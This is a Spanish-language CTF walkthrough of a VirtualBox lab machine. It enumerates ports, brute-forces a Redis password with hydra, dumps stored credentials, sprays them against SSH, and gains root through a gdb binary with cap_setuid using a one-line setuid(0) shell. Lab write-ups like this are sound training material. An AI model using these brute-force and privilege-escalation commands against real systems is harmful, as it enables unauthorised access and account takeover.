Identificamos la IP de la máquina víctima:
❯ arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.227Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.227
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 17:16 -0300
Nmap scan report for 10.207.245.227
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6379/tcp open redis
MAC Address: 08:00:27:9F:85:90 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds❯ nmap -sCV -p 22,6379 -oN 02-targeted.txt 10.207.245.227
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 17:17 -0300
Nmap scan report for 10.207.245.227
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
6379/tcp open redis Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 secondsEl puerto 6379 corre Redis, pero requiere autenticación:
❯ redis-cli -h 10.207.245.227 COMMAND INFO GET
(error) NOAUTH Authentication required.Hacemos fuerza bruta de la contraseña con hydra:
❯ hydra -P ~/Documents/wordlists/rockyou.txt 10.207.245.227 redis -t 64
...
[6379][redis] host: 10.207.245.227 password: hellow
...Ya autenticados, listamos los comandos disponibles filtrando los relacionados con claves:
❯ redis-cli -h 10.207.245.227 -a hellow COMMAND LIST | grep key
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
command|getkeysandflags
command|getkeys
hkeys
cluster|keyslot
cluster|countkeysinslot
cluster|getkeysinslot
keys
randomkey
❯ redis-cli -h 10.207.245.227 -a hellow COMMAND LIST | grep get
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
command|getkeysandflags
command|getkeys
getbit
slowlog|get
hgetall
config|get
getrange
get
acl|getuser
cluster|forget
cluster|getkeysinslot
getdel
hmget
mget
getset
client|getredir
client|getname
hget
getexListamos las keys y volcamos su contenido, que resulta ser un conjunto de credenciales:
❯ redis-cli -h 10.207.245.227 -a hellow KEYS '*'
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
1) "key5"
2) "key1"
3) "key3"
4) "key4"
5) "key2"
❯ redis-cli -h 10.207.245.227 -a hellow MGET key1 key2 key3 key4 key5
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
1) "killer:K!ll3R123"
2) "ghost:Ghost!Hunter42"
3) "snake:Pixel_Sn4ke77"
4) "wolf:CyberWolf#21"
5) "shadow:ShadowMaze@9"Formateamos las credenciales en listas de usuarios y contraseñas, y hacemos fuerza bruta contra SSH (probando todas las combinaciones por si hay reutilización cruzada):
❯ cat credentials.txt
"killer:K!ll3R123"
"ghost:Ghost!Hunter42"
"snake:Pixel_Sn4ke77"
"wolf:CyberWolf#21"
"shadow:ShadowMaze@9"
❯ cat credentials.txt | awk -F ':' '{print $1}' | tr -d '"' > users.txt
❯ cat credentials.txt | awk -F ':' '{print $2}' | tr -d '"' > passwords.txt
❯ hydra -L users.txt -P passwords.txt 10.207.245.227 ssh -t 64
...
[22][ssh] host: 10.207.245.227 login: killer password: ShadowMaze@9
...Nos logueamos con killer:ShadowMaze@9 (credenciales cruzadas) y obtenemos la primera flag:
❯ ssh killer@10.207.245.227
killer@10.207.245.227's password: ShadowMaze@9
killer@lower6:~$Para escalar privilegios, buscamos binarios con capabilities (Linux Capabilities Privesc):
killer@lower6:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=epgdb tiene la capability cap_setuid, que nos permite invocar setuid(0) y lanzar una shell de root:
killer@lower6:~$ gdb -nx -ex 'python import os; os.setuid(0)' -ex '!bash' -ex quit
root@lower6:~#Obtenemos la flag y fin.